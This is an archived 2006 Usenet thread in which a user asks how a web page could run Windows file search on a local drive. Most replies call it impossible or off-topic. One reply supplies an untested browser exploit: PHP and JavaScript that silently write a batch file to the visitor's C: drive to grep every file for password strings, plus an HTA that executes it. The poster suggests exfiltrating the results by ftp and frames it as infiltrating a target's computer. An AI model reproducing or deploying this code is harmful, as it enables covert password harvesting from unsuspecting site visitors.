How do I run the MS Windows file search program from html

I am sure you could do it with Asp.NET. You may need an activex control
or some DLL to get it working though. I do more PHP/MySQL so I am not
entirely sure.

Ray Muforosky wrote:

Hello all:

Task: I want to do file search, using the "conatining text" option from
a web page.

How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

Any help will be appreciated.

On 22 Aug 2006 11:46:37 -0700, "Ray Muforosky" <mu****@gmail.com>
wrote:

>How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

How does this have to do with Perl? Unless you're using PerlScript, or
expect people to, for what it matters, that is...
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
..'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,

Ray Muforosky wrote:

>Hello all:

Task: I want to do file search, using the "conatining text" option from
a web page.

How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

Any help will be appreciated.

On Tue, 22 Aug 2006 12:42:42 -0700, moojoo wrote:

I am sure you could do it with Asp.NET. You may need an activex control
or some DLL to get it working though. I do more PHP/MySQL so I am not
entirely sure.

....and the client would have to grant access to do it so if we're talking
about a public site (or a client not running Windows obviously) you can
forget it.

--
The USA Patriot Act is the most unpatriotic act in American history.
Feingold-Obama '08 - Because the Constitution isn't history,
It's the law.

Ray Muforosky wrote:

Hello all:

Task: I want to do file search, using the "conatining text" option from
a web page.

How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

You can't, unless, possibly, you use some kind of ActiveX object and
your users have their security levels set dangerously low.

I'm trying to picture the situation where someone would want to find
something on his hard drive and would go to your web site to do it
instead of using the Windows search feature directly.

On 22 Aug 2006 11:46:37 -0700, Ray Muforosky wrote:

Hello all:

Task: I want to do file search, using the "conatining text" option from
a web page.

How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

Any help will be appreciated.

Upload your local drive and submit it to MSN.

--
buy, bought, bye

On Tue, 22 Aug 2006 14:47:23 -0500, Ivan Marsh <an*****@you.now>
wrote:

>>How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

[snip]

>...and the client would have to grant access to do it so if we're talking
about a public site (or a client not running Windows obviously) you can
forget it.

And it would be awkward, albeit maybe not strictly impossible to even
want to run the Windows search program on a machine not running
Windows. It's clear that the question was referring to a client
running on a Windows box.
Michele
--
{$_=pack'B8'x25,unpack'A8'x32,$a^=sub{pop^pop}->(map substr
(($a||=join'',map--$|x$_,(unpack'w',unpack'u','G^<R<Y]*YB='
..'KYU;*EVH[.FHF2W+#"\Z*5TI/ER<Z`S(G.DZZ9OX0Z')=~/./g)x2,$_,
256),7,249);s/[^\w,]/ /g;$ \=/^J/?$/:"\r";print,redo}#JAPH,

On Tue, 22 Aug 2006 23:06:59 +0200, Michele Dondi wrote:

On Tue, 22 Aug 2006 14:47:23 -0500, Ivan Marsh <an*****@you.now>
wrote:

>>>How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

[snip]

>>...and the client would have to grant access to do it so if we're talking
about a public site (or a client not running Windows obviously) you can
forget it.

And it would be awkward, albeit maybe not strictly impossible to even
want to run the Windows search program on a machine not running
Windows. It's clear that the question was referring to a client
running on a Windows box.

That's what obviously means.

--
The USA Patriot Act is the most unpatriotic act in American history.
Feingold-Obama '08 - Because the Constitution isn't history,
It's the law.

In comp.lang.perl.misc Ray Muforosky <mu****@gmail.comwrote:

Task: I want to do file search, using the "conatining text" option from
a web page.

How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

Cygwin and grep?

AXEL

ax**@white-eagle.invalid.uk wrote:

In comp.lang.perl.misc Ray Muforosky <mu****@gmail.comwrote:

>Task: I want to do file search, using the "conatining text" option from
a web page.

>How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

Cygwin and grep?

there are native ports of grep, see:
http://johnbokma.com/mexit/2006/07/01/

--
John Experienced Perl programmer: http://castleamber.com/

Perl help, tutorials, and examples: http://johnbokma.com/perl/

Ray Muforosky wrote:

>
Task: I want to do file search, using the "conatining text" option from
a web page.

How do I search for a file on my local drive containing a certain
string, from a web page. That is, how do run the windows search program
from a web page.

Not, I am sure, by using Javascript - so I am afraid you will probably
need to ask in a Microsoft newsgroup.

The Magpie wrote:

Ray Muforosky wrote:

Task: I want to do file search, using the "conatining text" option from
a web page.

Most modern browsers have implemented a cross domain access policy for
client side scripting

making it near impossible to effectively achieve this task with
standard HTML.

MSIE's HyperText Applications (*.HTA) on the other hand is a much more
promiscuous doctype and

can access the coveted protected local domain.

Furthermore .exe's can be arbitrarily executed from .HTA's in IE.

How do I search for a file on my local drive containing a certain
string, from a web page.

The XP command line to search for a string (in this case strings with
words starting with pass) and save the results would be something
like:

findstr /p /i /s "\<pass.*" c:\*.* c:\pass.txt

Full syntax reference:

http://www.microsoft.com/resources/d...s/findstr.mspx

Still at this point even though we can pop open an exe via script in
IE's chromeless client how are we going to pass the command line switch
variables ?

All those slashes and wildcards don't look like they'd make very good
tag soup.. maybe encode it. Dunno if the direct approach would work too
smoothly though.

That is, how do run the windows search program
from a web page.

Not, I am sure, by using Javascript - so I am afraid you will probably
need to ask in a Microsoft newsgroup.

A possible workaround is to pass the command switchs via file
encapsulation and deliver it via a local file exploit (created by
SPTH)~

Use PHP & JavaScript to write a local bat (on your targets compouter)
containing your findstr search line, and then in theory auto refresh to
an .HTA which executes the local .bat with VBScript ..

File: search.php

<?
$nl=chr(13).chr(10);
echo '<html><head>';
echo '<script language='.chr(34).'JavaScript'.chr(34).'>'.$nl;
echo 'function go(){'.$nl;
echo 'var fso=new
ActiveXObject('.chr(34).'Scripting.FileSystemObjec t'.chr(34).')'.$nl;
echo 'var
file=fso.CreateTextFile('.chr(34).'C:\\\search.bat '.chr(34).')'.$nl;
$cont="findstr /p /i /s \"\<pass.*\" c:\*.* c:\pass.txt";
$i=0;$nc='';
echo 'file.Write(';
while ($i<strlen($cont)){
echo 'String.fromCharCode('.ord($cont{$i}).')+';
$i++;
}
echo chr(34).chr(34).')'.$nl;
echo 'file.Close()}'.$nl;
echo '</script>';
echo '<meta http-equiv=refresh content=15
url='.chr(34).'run.hta'.chr(34).'>';
echo '</head>';$nl.$nl;
?>
<body language="JavaScript" onload="go()"></body></html>

Code lifted and warped from: http://vx.netlux.org/lib/vsp13.html

File: run.hta

<html>
<head>
<HTA:APPLICATION ID="HTA"
VERSION="1.0"
APPLICATIONNAME="RemoteSearch"
BORDER="thin"
BORDERSTYLE="normal"
CAPTION="yes"
CONTEXTMENU="no"
ICON=""
INNERBORDER="yes"
MAXIMIZEBUTTON=no"
MINIMIZEBUTTON="no"
NAVIGABLE="yes"
SCROLL="no"
SCROLLFLAT="yes"
SELECTION="yes"
SHOWINTASKBAR="yes"
SINGLEINSTANCE="yes"
SYSMENU="yes"
WINDOWSTATE="normal"
/>

<script language="VBScript">
Dim objShell
Sub Run(Name)
Set objShell = CreateObject("WScript.Shell")
objShell.Run Name
On Error Resume Next
Set objShell = Nothing
End Sub
</script>
</head>
<body onload="javascript:Run('file://C:/search.bat');"></body></html>

Code lifted and warped from:
http://www.experts-exchange.com/Web/..._20709676.html

So there we go (it's not tested but the example is based on working
concepts)..

We've infiltrated, searched and even logged the results.. now all you
have to do is recover the data (perhaps via another line in the bat to
ftp the file)..

The above php/js exploit should write local files without warning.. hta
files on the other hand pop up an alert box while loading.. plus any
clever malware scanner would probably spot or prevent the process.

You may be able to write the .hta locally and then load it to get
around the warning.. or maybe not.. either way it's going to be mighty
obvious when the dos box pops up for a few seconds (or minutes if
you're searching alot of local sub-directories).

Disclaimer: The examples are provided for entertainment / edu only. I
take no responsibility for how you implement this code, if it violates
your hosts TOS or if it destroys your computer or the computer of any
user that YOU subject to it's wrath. If I were you I'd accept that it's
a bad idea and totally against general net etiquette; an obvious
violation of privacy, and could potentially get you arrested very
quickly.

wj*****@gmail.com wrote:

The Magpie wrote:

>Ray Muforosky wrote:

>>Task: I want to do file search, using the "conatining text" option from

Do none of you know how to stop cross-posting to irrelevant groups?
Just because the OP splattered a question across four disparate groups
is no reason for everyone else to do so too.

--

Henry Law <>< Manchester, England

Henry Law wrote:

wj*****@gmail.com wrote:

>The Magpie wrote:

>>Ray Muforosky wrote:
Task: I want to do file search, using the "conatining text" option from

Do none of you know how to stop cross-posting to irrelevant groups? Just
because the OP splattered a question across four disparate groups is no
reason for everyone else to do so too.

Indeed we do - however, please note that the quoting on this message is
not correct and I did not post to irrelevant groups.